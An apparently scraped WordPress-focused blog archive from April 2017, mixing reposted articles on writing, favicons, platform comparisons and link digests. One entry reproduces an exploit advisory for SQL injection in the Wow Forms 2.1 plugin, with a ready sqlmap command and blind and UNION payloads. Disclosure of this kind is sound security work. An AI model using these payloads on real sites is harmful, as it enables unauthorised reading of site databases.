Sunday, April 30, 2017

Thank you to for Freshly Pressing me!

The day before I re-launch my site, and move this show over to a self-hosted site, I wanted to say thank you to for so many years of great hosting.

Here is the first ever post of mine to be Freshly Pressed: Writing Funks.

I'm very grateful.

PS Do you write stories? Take a look at my free training course for writers.

Writing Cycles, Writing Funks

One of the funny things about writing a blog is that you see, on the screen in front of you, plain evidence of the upswings and downswings of your time, inspiration, and urge to write. You know when you haven't posted much in a while.

It's a very odd thing, however, how little the conscious mind seems aware of these flows of energy and strength.

I might detect, consciously, no reason why I can't sit down and write another paragraph of a story, or draft that little essay on Paco di Lucia that I had planned, and yet once I've been sitting at my desk for a time, and been unable to write much, it suddenly occurs to me that I've been away from home three weekends in a row. Simply speaking, I've exhausted myself and need to take a break.

My artistic well–which resides somewhere in the brain far deeper than consciousness, which seems fed by a strange and unstable mixture of rest, routine, books and conversation, competition, and deadlines–had run (temporarily) dry.

I'm sure that everyone who does creative work is familiar with these bouts of high energy and low. Emerson wrote, in the essay "Circles:"

Our moods do not believe in each other. To-day I am full of thoughts, and can write what I please. I see no reason why I should not have the same thought, the same power of expression, to-morrow. What I write, whilst I write it, seems the most natural thing in the world; but yesterday I saw a dreary vacuity in this direction in which now I see so much; and a month hence, I doubt not, I shall wonder who he was that wrote so many continuous pages.

Yet still, it would be nice to be able to track the level of that well of artistic energy, and know in advance when it was getting low, or know confidently what action to take to quickly restore it. But when I find myself thinking like that, I'm reminded of something very wise once told to me in a London cafe.

This was a couple of years ago now, when I was jotting down ideas in a notebook, and I got the strong impression that the woman sitting at a nearby table was a writer. She was, in fact, Michelene Wandor, the author of a major study of the creative writing industry, The Author Is Not Dead, Merely Somewhere Else. We started talking, and I mentioned these sort of thoughts.

She replied (and I'm repeating this from memory, so it may not quite be accurate) that writing is supposed to be a social activity. It's supposed to have a social function, too–a wider purpose. When we forget this, and instead treat writing as something purely personal, then we naturally become a little manic about it. We treat the capacity to write as proof that we have a soul, and so we make "writer's block" a terrible condition. But writing is supposed to be like everything else, with a rhythm and a flow. It's supposed to interact with life as well as, at times, require a retreat from it. No one is supposed to write all the time, she said. And so my three recent weekends away were not, in this sense, weekends away from writing–they were part of my life, just as the writing is.

Thinking about this idea, today, I am also reminded that, actually, I have written a great deal lately. I've just completed the first big section of a new novel, 150 pages, which I'm about to show to classmates, and, possibly, my agent. I've got a fair idea, too, how to move forward with the second section–it's very exciting. So perhaps my conscious mind is bad, also, at knowing when I've been writing "enough." Perhaps that well of mine is wiser than I am, keeping my reserves fresh for the big, on-going project.

What's your experience of this? Are you, regardless of the points made above, a firm believer in daily writing?

— Daniel

Source: Thank you to for Freshly Pressing me!

Saturday, April 29, 2017

A Quick Guide to Adding a Favicon to Your WordPress Site

Brand recognition is critical for a company's website. That's why you invest so much time coming up with a simple yet bold color palette, consistent imagery, and well-defined brand messaging. The more consistent you are in defining and establishing that identity across your site, the more ingrained it'll become in your visitors' minds.

But you know that it's not just what appears on your site that visitors, prospects, and customers remember you for.

Social media pages need to align with your brand identity; video branding does, too. It's not just these larger offshoots of your brand that matter either. Take your favicon, for instance. It's such a small detail—one that doesn't even occur on a web page—and yet there's a good likelihood your visitors will notice if you don't have one or if the one you've chosen doesn't look great.

It's this attention to detail when developing a consistent brand identity that will really drive home the idea that the company or individual behind this website has got it together. In other words, not only did you take time to create a small icon to maintain your brand's presence outside of the website, but you also considered how it affects UX, too.

If you've yet to create or add a favicon to your WordPress website, you've got to get on that, like, now. Or, better yet, yesterday.

Why Your WordPress Website Needs a Favicon

These are what favicons look like in the address bar and in browser tabs:

These are also favicons, this time in your bookmarks:

Here's another example of favicons you can find in a web browser's history:

Did you even realize your site's favicon got so much airtime?

Like I said, this is about establishing a clear presence of your brand on-site as well as off. Sure, a favicon is pretty small so it might not always get noticed, but no matter how far users deviate from your site, don't you want them to still have a piece of your brand they can instantly recognize?

In addition to bolstering your brand identity, favicons also help guide visitors back to you. If you create an eye-catching and unique favicon that helps users easily pick it out of a crowd of other favicons, they'll remember that.

How to Create a Favicon for Your WordPress Site

Follow these three steps to create a high-quality favicon and ensure that it displays correctly on all browsers.

Step #1: Design the Favicon

By this point, you should already have a logo for your website. Start there.

You then have a few different options for designing a favicon:

  • You can use whichever design program you're the most comfortable with (ideally, the one used to design your logo). Photoshop is one of the more popular options, but you can also use a free tool like Canva. Then extract a piece of the logo that's unique as well as memorable.
  • You can also create something completely new if you don't have a logo to work from. This Favicon tool is a good one to try.
  • Lastly, you can always download a free icon from the web until you have an official logo created for your site.
  • When creating a favicon, be sure to follow W3C's guidelines for sizing it. Basically, they recommend you design a favicon as a square, either 16×16 or 32×32 pixels. For colors, they recommend 8- or 24-bit.

    Once a favicon is designed and ready to go live, you'll need to export the file either as an ICO, PNG, or GIF. These are the three most universally accepted favicon formats. That being said, ICO is the most versatile of them all as it stores various sizes and versions within the single file, so that each browser can determine which of those sizes is optimal for their purposes. If you're unsure of how to export to ICO, use this Favicon Generator.

    Step #2: Add the Favicon to Your Site

    There are three methods for adding a favicon to a WordPress website.

    Option #1: Code

    If you prefer to code the favicon into the backend, you can use this option.

  • Save your favicon file as "favicon.ico".
  • Upload it to the root directory on your server.
  • Update the HTML code in th element of your site. Here is the favicon code that all browsers will accept:<link rel="shortcut icon" href="" />
  • Save your changes.
  • Option #2: Theme Customizer

    This second option is available if your WordPress theme customizer allows for it (which most do).

  • Log into WordPress.
  • Navigate down to the Appearance tab and select Customize.
  • Find the Site Identity widget.
  • In there, you can define your site's title, tagline, and upload your favicon.
  • Save your changes.
  • Option #3: Use a Plugin

    WordPress plugins let you do practically anything, so it shouldn't come as a surprise that they can do this, too.

    The RealFaviconGenerator's WordPress plugin is my pick for easily generating and setting up a favicon for your site. It's rated 5-stars in the WordPress Plugin Directory and has 100,000 active installs, so it's pretty much guaranteed to work for you, as it did for me.

    Step #3: Check the Favicon on the Front-End

    As with any other work you do on your site, you should take a moment to verify that your favicon looks good when live. Use the RealFaviconGenerator to test it out on all major browsers. Once you're pleased with the end result, you should be good to go. There, wasn't that easy?

    Wrapping Up

    Want to ensure your brand is instantly recognized no matter where users engage with it? Create a clear and unique symbolic representation that you can add to WordPress. Then let the favicon serve as your stand-in no matter where people run into your website or its bookmark stand-in around the web.

    Source: A Quick Guide to Adding a Favicon to Your WordPress Site

    How to Use #WordPress - #WordPress 101

    How to Use WordPress - WordPress 101 So, you have installed WordPress on your server, and everything looks good. But how do you use WordPress? To start using WordPress, you need to log into the admin section of your website. This section includes all the features and options to manage the ... read moreBlogging 101: Setting Up Your Blog in WordPress Content Academy's Blogging 101: Setting Up Your Blog in WordPress in-person workshop ... Scott provides blogging strategy and WordPress development services for a those who are looking to use WordPress and search engine strategy to promote their products ... read moreHow to Create a WordPress Theme? This is a two-fold step where you have to use the HTML code and PHP code along with the WordPress function. You can also insert valuable keywords in the header if you want. The next part of the step is to add the stylesheet file where you can modify the ... read more

    How To Use Flipboard The following figures speak for themselves, although I should add that I've only started using Flipboard within the last few ... article on how to add a Flipshare sharing button to a WordPress blog. They thanked me for posting the article and asked ... read moreSEO 101: The Definitive Guide To Ranking Your Blog On Google's First Page Using WordPress is a good first step as it features a large selection of great designs that are SEO-optimized out of the box. Look for a quality theme. Something clean, simple, effective, pretty to look at and fast to load. Google is expanding the use of ... read moreThe Best of in April Read our interview with the designers, Caroline Moore and Kjell Reigstad. For a chance to be featured on the website, post WordPress swag pics to Twitter and Instagram using #WPSWAG. Use code WPSWAG for 20% off all items. (Offer ends May 12.) Longreads is ... read moreWordPress 101 Video Tutorials – Learn WordPress Basics Free ... VS Pages – WordPress 101 The video describes more about Posts and Pages, two different types of content that you will be creating in WordPress. Learn how easy it is to add images to your WordPress Posts and pages using the Add Media option in the ... read moreA Quick Guide to Adding a Favicon to Your WordPress Site If you're unsure of how to export to ICO, use this Favicon Generator. This second option is available if your WordPress theme customizer allows for it (which most do). You can update your favicon using the Theme Customizer. WordPress plugins let you do ... read moreWordPress 101 See how easy it is... Add WordPress 101 Tutorial Videos to Client Websites from iThe... Do you use our WP101 Plugin to train your clients? If so, check this out. The latest update for iThemes Sync includes a new integration with the WP101 Plugin so you can ... read moreWordPress 101 The first step to using WordPress is installing it ... to install a theme I think it is absolutely an important topic to cover, and since this is WordPress 101, it should be in here. To install a WordPress Theme that you've downloaded to your desktop ... read more

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    Source: How to Use #WordPress - #WordPress 101

    Friday, April 28, 2017

    The Best of in April

    The Best of in April

    The 2017 default theme is here, plus: inclusive design, editing tools, Swag Store, and must-follow sites.

    You're off to a strong creative start in 2017! Here are a few recent updates and stories from the community in April that we wanted to share with you.

    This Year's WordPress Default Theme, Twenty Seventeen, Is Now Available


    "Great looking theme!" – Jason Thornberry

    Independent Publisher 2 Is Here


    The Independent Publisher theme has long been beloved for its simplicity and legibility, and we're happy to announce that it has been improved, ever so slightly. Read our interview with the designers, Caroline Moore and Kjell Reigstad.

    Check Out the New Look, Products, and Features of the WordPress Swag Store


    For a chance to be featured on the website, post WordPress swag pics to Twitter and Instagram using #WPSWAG. Use code WPSWAG for 20% off all items. (Offer ends May 12.)

    Longreads Just Turned 8 Years Old. Here's What the Next Eight Years Look Like


    Longreads is rapidly becoming the best place on the internet for personal essays, and there are ambitious plans to do even more. Read more on our plans, and contribute to the Longreads story fund — will even match your contributions.

    AA Quote 01 alt

    Better conceptualizing, designing, building, and improving how to meet the needs of underserved users is a core part of how we work at, and that was the focus of April's Design and Exclusion (#DesignX) conference (check out the complete video and transcript at 


    How can we help entrepreneurs working in cities around the world? That's the challenge Hajj Flemings explored in an April essay for He shares some of the insights which came out of the 100 Project Hackathon — a project tasked to build nine small business sites in a 48-hour period in Detroit. 

    Perspectives: 'But Wait, Is Your Last Name Filipino?' (Samantha Hankins)

    10,000 Kilometers: Quintin Lake on Walking and Photographing Britain's Coastline

    Flock of Sheep, Gammon Head, Devon.

    Two Aprils ago, Quintin Lake set off from St. Paul's Cathedral in London. The journey? To walk 10,000 kilometers around the coast of Britain. We caught Quintin just before he embarked on a 15-day adventure around the edge of Snowdonia, North Wales. Read about Quintin's epic walk along the sea.

    Quotables: "If you really love writing, it's like eating. You can't live without doing it." – The writing life of Harvard historian and New Yorker staff writer Jill Lepore (Harvard Gazette).

    Case Study: A collection of portraits, street scenes, and details from Bangkok.

    Try it out: Importing Google Docs →

    Now following

    "WordPress was the best… I'm very happy to be back." — welcome back, Leo Laporte!

    Check out Amazon CTO Werner Vogels's new site,

    Hang out with us on Instagram and tag your 'grams with #DiscoverWP.

    That's all for now!

    What did you love about your own work in April? Comment with a link to a post you're proud of, or something new you learned about designing your site. Feeling motivated? Download the WordPress app on iOS and Android. 

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    Source: The Best of in April

    Goodbye to The Incompetent Writer, and to

    Goodbye Prince Though the idea of "blue states" and "red states" wouldn't catch on for another two decades, it's an appropriate framework for Purple Rain's goals; The song was designed as a perfect amalgamation of red and blue tastes. Much has been made of ... read moreBitcoin Says Goodbye To Silk Road And Hello To Baidu, China's Google There are a number of legitimate businesses accepting Bitcoin payments after all, from WordPress to OkCupid ... pay in BTC. The Forbes E-book On Bitcoin Secret Money: Living on Bitcoin in the Real World, by Forbes staff writer Kashmir Hill, can be bought ... read more10 Great WordPress Plugins to Manage an Editorial Workflow Let's roll up our sleeves, say goodbye ... and start putting WordPress to work! Do you use checklists to consistently produce the best content? Hopefully the answer is yes! Well now you have a way of easily sharing these with other writers on your ... read more

    Microsoft employees give Live Writer, the beloved blogging app, a open-sourced second chance Windows Live Writer was a desktop program you can use to write blog posts offline, preview how they'll look on your site, then publish to a wide range of content management systems including WordPress ... Related: Say goodbye to Micro$oft — the ... read moreNew York Times Wants Nursing Homes to Starve Patients to Death "Without Asking Permission" The slower pace of death from fasting, compared with ingesting barbiturates, gives people time to say goodbye and ... depressed oldsters need is a writer on aging issues pushing self-starvation as a splendid way out. Note: Wesley J. read moreEx-'SNL' writer found dead in suicide LOS ANGELES — Former "Saturday Night Live" writer Joseph Bodolai has committed suicide in ... A message on the Twitter account (at)joebodolai said "Goodbye" and had a link to the blog. The Associated Press could not independently verify the ... read moreThe Journalist and the Troll: This Man Spent Two Years Trying to Destroy Me Online Whenever a new image of me came online, a Blot article followed, with insults stamped over the image: FRAUD, DUMB, RACIST, INCOMPETENT I met Wey in September 2010, when he sailed into the Bloomberg offices ... with Wey waving goodbye to his Columbia ... read more'Californication' Finale: David Duchovny Says Goodbye to Hank Moody WARNING: "Californication" fans who have not watched the series finale should stop reading. This interview with star David Duchovny contains spoilers about that episode. After seven seasons of charting the booze-soaked escapades of writer-cum-lothario ... read moreIntroducing the Imperium News Network, Goodbye to We are proud to announce the grand opening of Imperium News and simultaneously the closure of ... with basic features available on WordPress requiring custom code for Drupal. If you are ever thinking about setting up a CMS/blog/whatever and someone tells ... read moreGhost Themes: 24 Free Themes For You To Download This CMS focuses on individual writers and bloggers, not the full scale magazines ... they don't contain any of those conventional items which bulk up websites. They have even said goodbye to the traditional sidebar. At first look, Ghost blogs may ... read more

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    Source: Goodbye to The Incompetent Writer, and to

    Thursday, April 27, 2017

    Guide on how to use #Google Docs #App on #Android to write an #Article for my #Blog post #WordPress

    Guide on how to use Google Docs app on Android to write an article for my Blog post WordPress Today I'm covering the topic of how to use Google Docs app on an Android mobile phone to efficiently write an article for my site regardless of where I'm and whenever the inspiration comes on. This write up, is more of a guide on how you could use ... read moreWordPress Introduces a new Add-on That Lets Users Write on Google Docs and Directly Publish on WordPress Collaborating is one of the quintessential of drafting an article ... the Google Docs can also be saved as a draft in the WordPress blog. The new feature can be accessed by any blogs that run on and custom domains can simply make use of ... read more19 Best Mobile Apps to Manage Your WordPress Site If you are not already using it, then see our step by step guide on how to install Google Analytics in WordPress ... We hope this list helped you find some new apps to manage your WordPress site on the go. You may also want to see our list of 24 must ... read more

    How To Add A Google Docs Contact Form To Your Blog [Blogger] Fortunately, if you are also a Google Docs ... blog. At this point, your preview should look similar to the image below. However, previews are going to be different for different people based on the machine they are using. As I discovered with my personal ... read moreIntroducing for Google Docs: A New Way Forward for Collaborative Editing We are happy to announce for Google Docs, a new add-on that lets you write, edit, and collaborate in Google Docs, then save it as a blog post on any or Jetpack-connected WordPress site. Your images and most formatting will carry ... read moreGoogle Docs Editing Comes to Android, iPhone and iPad Google Docs ... best Android phones for every budget. ] I haven't received the rollout yet, but judging from Google's blog post and demonstration video, editing appears to be primitive compared to proper office apps, with only the ability to write text ... read moreA Step-by-Step No-Nonsense Guide on How Google Drive Works After Google Docs' success ... opt for Google Apps for Work can either get 30GB per user, or unlimited storage space, depending on the plans chosen. Though, for unlimited storage, there should be at least five users. Pro Tip — Many Android phones ... read moreHow to Set Up and Use Google Docs Offline You can work on your Google Drive files offline, but only if you take a few steps before you reach an Internet-free zone. I recently started working entirely in the cloud. My ... apps for Docs, Sheets, and Slides (or whichever of those services you use). read moreGoogle Refreshes the Play Store, Making It Easier to Manage Apps Google ... any ancient apps buried away that you might have forgotten about. You should see the update by now, but if not it should show up shortly. Advertisement The new Play Store "My Apps" screen layout is rolling out more widely | Android Police read moreHow To Use Google+ | A Quick Guide To Google Plus The below post is from ... honest I wouldn't use this as it would just fill up my stream with crap that I haven't got time to read. But for the mainstream this I suppose could be useful(ish). To be honest you have RSS, Google Desktop and other stuff ... read more

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    Source: Guide on how to use #Google Docs #App on #Android to write an #Article for my #Blog post #WordPress

    Wednesday, April 26, 2017

    Is WordPress Still the Best?

    I am a huge fan of WordPress.

    I've run my business on it for a decade, recommended it to thousands and feel eternally grateful for what it's allowed me to do.

    But is it still the best option?

    As you might have noticed, the blogging scene has changed a lot in the last five years.

    There's free platforms like Tumblr and Medium that are now absolutely booming and doing things slightly differently.

    Squarespace, the ultra-sexy hosting service (and podcast industry mega-patron!) is everywhere and is pretty awesome too.

    Then there's the fact that a lot of people blog on social networking sites like Instagram and Facebook and that seems to be enough for them.

    Today we're going to take a look at whether WordPress is still the best bet for bloggers and website owners who are just starting out.

    As always, I'd love your comments below.

    Every platform as it's own advantages

    One of the first things to note here is that each platform will have some features and advantages that are lacking in the other platforms.

    When you're looking to start a blog or website it's important to note these features because one something that's important to you might be completely irrelevant to me.

    For example, if you write a blog on LinkedIn you'll enjoy the fact that it's pretty easy for all of your contacts to see the articles that you write, and everyone who reads it will be pretty targeted to your niche. Try to integrate a product to sell or a mailing list, however, and you'll be pretty stuck.

    So, when reading the rest of this article please note that the evaluations are made based on what I consider to be the most important features and options for running a successful blog.

    So, what does WordPress have going for it?

    Let's start this little analysis by looking at some interesting facts and stats about WordPress so you have an idea of what we are working with.

  • Over 24% of the entire web is powered by WordPress.
  • There are over 500 new sites created per day.
  • Over 1,200,000 people have downloaded WordPress plugins.
  • WordPress is available in 56 languages.
  • 17 posts are published every second on WordPress
  • It truly is the most popular platform in the world and for good reason. Here is why I still use and recommend WordPress for bloggers and online entrepreneurs of all levels.

    Please keep in mind that I'm talking about a self-hosted WordPress blog here as opposed to the free version.

    The main advantage that WordPress has always had over its competition is the seemingly unlimited ability to customize everything from the source code to the look at feel.


    As you can see above, there are roughly 40,000 plugins available – each one giving you new abilities and functions on your blog – and it's all usually for free or a very small cost (compared to actually building the feature).

    You might add a store, harden your security, add icons, generate opt-in forms, change your header design, improve your SEO… the list is endless.

    And if you don't like the way a particular plugin works you can open up the code and tweak it yourself. Or you can pay someone to re-write the whole darn thing until it works exactly like you need it to. You can do this at the plugin level, or open up your server and change it from that level. You have complete control – something missing from many other platforms.

    wordpress themes

    Now if we take that same idea over to the topic of themes/templates you'll see that the WordPress theme directory itself has over 2,000 themes in just the popular section alone – all of them free. There are thousands more available.

    Then you can go premium and look at sites like Theme Forest which has around 9,000 premium themes designed by professional WordPress designers whose sole job is to design themes that function well.

    People who say that places like Squarespace are better because they offer better support often overlook this fact. Sure, you can get support on the free WordPress forums, but you also have support from your theme designer and your WordPress host.

    Once again, if you're not happy with the way your blog is looking you can open up the source code in five seconds and change colors, fonts, or engage a designer to help you re-work the whole thing.

    For me, having a WordPress blog is all about owning your asset, controlling your future, and having complete freedom to tinker and tweak whatever you like.

    On most other platforms (Medium, Tumblr, Squarespace, etc.) you are limited to their servers or their APIs and as such there is always going to be something that is limited. It might not be a big things, but when you're trying to run a business it might just be big enough to be a problem.

    There's got to be some downsides, right?

    As was mentioned at the top of the post, every blogging host or platform has it's downsides. And, as seems to happen with WordPress, sometimes your big advantages can turn into weaknesses.

    Security issues come with popularity

    For example, as WordPress becomes more and more popular we see increased instances of security breaches. It makes sense – the more people using the platform the luckier the intruders can get by sheer statistical probability.

    This issue is compounded by the fact that the open source nature of WordPress means that anyone can build a plugin and that plugin can either have bad intentions behind it, or just be coded in a way that leaves it vulnerable.

    To avoid this, it's important to always use up to date plugins, make sure you read the reviews first, and follow basic security protocols on your blog to ensure it stays safe. And remember, WordPress is not less secure than anything else it is just a target because more people are using it improperly.

    Lack of direct sources of traffic

    One of the reasons Medium and Tumblr have been doing so well as new blogging platforms is that they have their own little ecosystems that feed your blog's traffic and chances of success.

    For example, the front page of Medium has staff picks and popular items for the day, and you'll see recommendations from those in your social networks.

    This means that content has a good chance of being seen and shared by someone without all of the blogging SEO work that we need on WordPress self hosted setups.

    And here's one I found on the front page of Tumblr today that has had around 60,000 shares within the Tumblr network itself.

    The way that these newer platforms have started to bridge the gap between "website" and "social network" is very interesting and I think it will be a trend that we see more of in the future.

    This does not mean, however, that it's the best place to start a blog or website (especially if you want to make money with it) because you simply don't know if it'll be around in five years. Look at MySpace and Google+ and similar websites which everyone thought would be around forever. If you'd invested your time and effort into building a career there you may be in trouble.

    So what's the verdict on WordPress?

    While some other blogging platforms have made some big inroads recently, I still can't imagine moving away from a self-hosted WordPress setup.

    For me, it really comes down to the fact that WordPress offers you near unlimited options for configuration, design changes, feature development and expansion. You are never going to run out of room or power, and you're never boxed in to a different company's API or strictures.

    And while a lot of people decry WordPress updates as annoying, what they really represent is constant improvements, security patches, feature additions, etc.

    It is actually pretty amazing for something you essentially get for free.

    If you want to build a blog that supports your family or perhaps is the basis of a business that allow you to work from home then I would 99 times out of 100 recommend a the WordPress and host combination for the sheer fact that it's changeable and you control it.

    What do you think about WordPress?

    As always, I'd really love to know your opinions on how WordPress compares with the other platforms out there. I sometimes am a bit worried that I'm blinded to the features of the new players because I've been using this setup for such a long time, so please feel free to teach me a thing or two in the comments below.

    Source: Is WordPress Still the Best?

    New #WordPress Web#Hosting Option –

    Why Shared WordPress Hosting is the Best Option for New Blogs One of the most difficult tasks faced by anyone starting a new blog or internet marketing career is the process of selecting the web-hosting ... good options. I highly recommend shared hosting to start with, and if the time comes when your WordPress ... read moreA Step By Step Guide to Migrating Your WordPress Website To A New Web Host To get around the problem, people will either pay a professional to move their site for them, find a new host that offers the service as part of a new hosting package, or take the third option ... web host, we need to create an environment for a WordPress ... read morePrivacy Settings for Club Website If you want users to receive updates each time you publish new content you can invite them to be a ... If you want to add username accounts and passwords you have to hire a web host and move to a wordpress.ORG software install. Moving to self hosted ... read more

    How to Get Started With WordPress To that end, we've collected tips for setting up a fresh WordPress blog—tailored for both beginners and experts—to help you get the most out of your new website ... Remember that your Web host likely has tools to help automate this process, but ... read moreHow to Properly Switch From Wix to WordPress (Step by Step) Looking to switch from Wix to WordPress? Wix is a drag-and-drop website builder that lets you create a simple website. However, many Wix users soon realize that their options are limited ... thing you'll need is a web hosting account for your website. read moreHow to move your website to a new host I had to find a new place to live ... If you run a WordPress blog—as I do—you can also check out companies that offer more specialized WordPress hosting. With web hosting, you often get what you pay for, but many more expensive hosts can have poor ... read moreNew Malware Highlights Importance Of Updating & Securing Your WordPress Blog WordPress blogs are easy to install, simple to administer and hugely popular. Although there are no public statistics, 23.2% of the top 10 million websites were running WordPress software as of August 2013. The platform is the most popular option for sole ... read moreHow to Manually Backup Your WordPress Website by not downloading a new installation again, you gain time and can re-upload your whole website as soon as possible. You should have an FTP/SFTP client to access your web hosting. Thanks to this software, you can download all your WordPress files into a ... read moreHow to Backup a WordPress Site: A Step-By-Step Guide In this post, we'll cover some WordPress backup basics and how to backup a WordPress site in five ... backup solution and how each option shapes up. WordPress Backup Plugin (BackupBuddy) Backup Service through Web Host Manual Backup Downloadable Backup ... read more15 Benefits and Limitations of Blogs First I will highlight the major limitations of the Blogs which might make you decide to install the downloadable version ( with your own paid domain name and own web hosting ... Another popular option for bloggers is to ... read more

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    Source: New #WordPress Web#Hosting Option –

    Tuesday, April 25, 2017

    WordPress Plugin Wow Forms 2.1 - SQL Injection

    # Exploit Title: Wow Forms v2.1 WordPress Plugin SQL Injection # Date: 29/03/2017 # Exploit Author: TAD GROUP # Vendor Homepage: # Software Link: # Version: 2.1 # Contact: # Website: <> # Category: Web Application Exploits 1. Description An unescaped parameter was found in Wow Forms v2.1 (WP plugin). An attacker can exploit this vulnerability to read from the database. The POST parameter 'wowformid' is vulnerable. 2. Proof of concept sqlmap -u "http://server/wp-admin/admin-ajax.php" --data "action=send_mwp_form&arrkey%5B%5D=mwp-field-0&arrkey%5B%5D=mwp-forms-textarea-0&arrval%5B%5D=form2&arrval%5B%5D=rrr&mwpformid=1*" --dbs --threads=10 --random-agent --dbms mysql Parameter: Array-like #6* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 AND 6968=6968 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 AND (SELECT * FROM (SELECT(SLEEP(5)))gxQa) Type: UNION query Title: Generic UNION query (NULL) - 65 columns Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x6b656f4d516d7a6b736f596f49746d4e776a7663716f4d41654c6e516e516c6c6c7a5274744a6d57,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL— - 3. Attack outcome: An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible. 4. Impact Critical 5. Affected versions <= 2.1 6. Disclosure timeline 15-Mar-2017 - found the vulnerability 15-Mar-2017 - informed the developer 29-Mar-2017 - release date of this security advisory Not fixed at the date of submitting this exploit.
    Source: WordPress Plugin Wow Forms 2.1 - SQL Injection

    #WordPress #Domain name renewal expired

    Wordpress Domain name renewal expired Help! I've been trying to renew my domain name, registered through WordPress, but it's entered the redemption period and I can't get to anything that helps me to renew. Please advise asap. Thanks. Peter The blog I need help with is leadershiplamplight ... read moreCanot renew expired domain registered with The owner ignored a renewal reminder and the domain expired in late August ... However it had stopped appearing in the owner's fomain page. Yesterday, DNS resolution stopped, whois shows no name servers, and the status changed to ... read moreAbout Renewing an Expired Domain If your domain name has expired, renew it immediately. You should renew your domain name through the registrar (or reseller) that provided your domain name registration services. Once your domain has expired, it will be in Auto-Renew Grace Period (for 0-45 ... read more

    My domain has expired. Can I renew it? If you signed up for DNN reseller program or registered a domain with one of the resellers and want to know more about renewal of an expired domain ... to allow the registrant to renew the domain name. This means that extra 1 year is added to the domain ... read moreSony forgets to renew domain name, takes down online gaming service Sony Online Entertainment goes down thanks to expired domain name. Sony forgot to renew a key domain name,, which resulted in an outage on its popular Sony Online Entertainment game network found at While did not expire ... read moreDomain that has expired how to remove it from my account Hi, I have a domain that expired ... not renew your domain(s) during the 12-day Renewal Grace Period, you may incur a fee of £64.06 in addition to the domain renewal fee" The email you are receiving, from the sound of it, is about the domain name only. read moreDomain expired after renewal The WHOIS states it has expired: Quote:Status:RENEWAL HOLD Note: This Domain Name has expired. In this status the domain name is inactive. This domain name will be activated once it is renewed. The Owner of this domain name can renew this domain name from ... read moreGoDaddy subsidiary warehouses expired domains take over expired domains from registrants. They set up a company aptly named "Standard Tactics, LLC", which takes over some domains that have not sold on GoDaddy's TDNAM site and continues to monetize them. Read the full details over at Domain Name ... read moreHow do I renew my domain without renewing webhosting? I was trying to figure out how to renew my domain without renewing webhosting services, and I cancelled the domain registration renewal service. FYI, the billing info contains expired credit ... in AMP and the domain name will renew for you as it closes ... read moreRenewing Expired Domain Names It is always best to renew a domain name before it expires so there is no interruption in service and there is no risk of losing ownership of the domain name. If a name is expired so long that it is removed from the account, it may be possible to retrieve ... read more

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    Source: #WordPress #Domain name renewal expired

    Monday, April 24, 2017

    Free WordPress Training Videos Wales

    If you are looking for Free WordPress Training Wales then try the new 333 Website Builder from 333 Websites? The 333 Website Builder platform comes with an online Training Portal which includes access to Free WordPress Website Training Videos from UK Web Design Agency 333 Websites. In addition to having a Website built by 333 Websites for prices from […]

    Source: Free WordPress Training Videos Wales

    #WordPress Menu Creation Plugins

    WordPress Menu Creation Plugins I am wondering if there is a plugin available that replaces the current WordPress menu creation system or something I could use instead of the current system. Here is my issue. I have about 60 pages. There are 20 pages for different sports. Then each sport ... read moreHow to Keep Track of WordPress Plugin Menus After You Activate the Plugin For years, I taught thousands of people the basics of WordPress, both online and in-person ... Now if you activate a plugin and either: The plugin has no settings and doesn't create a menu item, or There is an extension or add-on that has settings ... read moreWordApp Review – Create a Native Mobile App For Your WordPress Site Want to create a mobile app for your WordPress site? The idea has always sounded cool ... But if you just want to create a functional appified version of your site, you can do it with a plugin called WordApp. And it's not just for blogs – you can ... read more

    WordPress Plugin Troubleshooting: What To Do When Your WordPress Site Breaks Use this option if the developer can't resolve the issue and you absolutely need this plugin on your site. Click Support in the main navigation menu of Select the Fixing WordPress section. Create a new thread in this forum. You're ... read moreHow to Add Hreflang Tags in WordPress A multilingual WordPress plugin allows you to easily create and manage content in multiple languages ... Right click and select 'View Page Source' from your browser menu. This will open the source code of the post or page. Now you need to look for ... read more4 WordPress Plugins To Make Your Site Mobile-Friendly And Responsive This only shows the scope of importance for mobile-friendly design and responsiveness to ... comes to building a 100 percent responsive WordPress menu that's user-friendly on both desktop and mobile. The plugin promises to make website navigation easier ... read moreWriting WordPress Plugins For Existing Features Does it make sense to create WordPress plugins for existing features if the plugin adheres ... The Discussion Settings that exist under the Settings menu for WordPress can be a bit overwhelming even for, what I believe, is the intermediate-level blogger ... read moreFloat Menu Pro (Menus) Use the smart WordPress plugin Float Menu Pro to increase the usability level of the site. Implement your unique floating menu using advanced tool settings. It perfectly adapts to any design of the web resource and does not take up much of the screen space. read moreSticky Menu System Plugins Available in WordPress ... for creating awesome navigation menus on a WordPress blog. This menu plugin is very popular and has got a third rank in the list of best sold plugins on some marketplaces. This plugin enables you to create some of the best menus in the fascinating ... read moreThe Beginner's Guide to WordPress Menus + Plugins And if that's not enough, we will share a couple of hand-picked WordPress menu plugins that will take your menus to a whole new level. How to Create the Perfect WordPress Navigation System Are you ready for some menu adventure? Well, eat al carte… In ... read more

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    Source: #WordPress Menu Creation Plugins

    Sunday, April 23, 2017

    Recommended WordPress and eCommerce Services

    On our site here you are going to find a ton of resources. Whether it's through our posts, our eCommerce plugin shop or our podcast, it's all there.

    This page is dedicated to a few curated resources that we know, trust and have built partnerships with. Please check them out for your own WordPress or eCommerce needs.

    Note: Some of these links are affiliate links. We will earn a small commission if you purchase the service, but it will not be any additional costs to you.

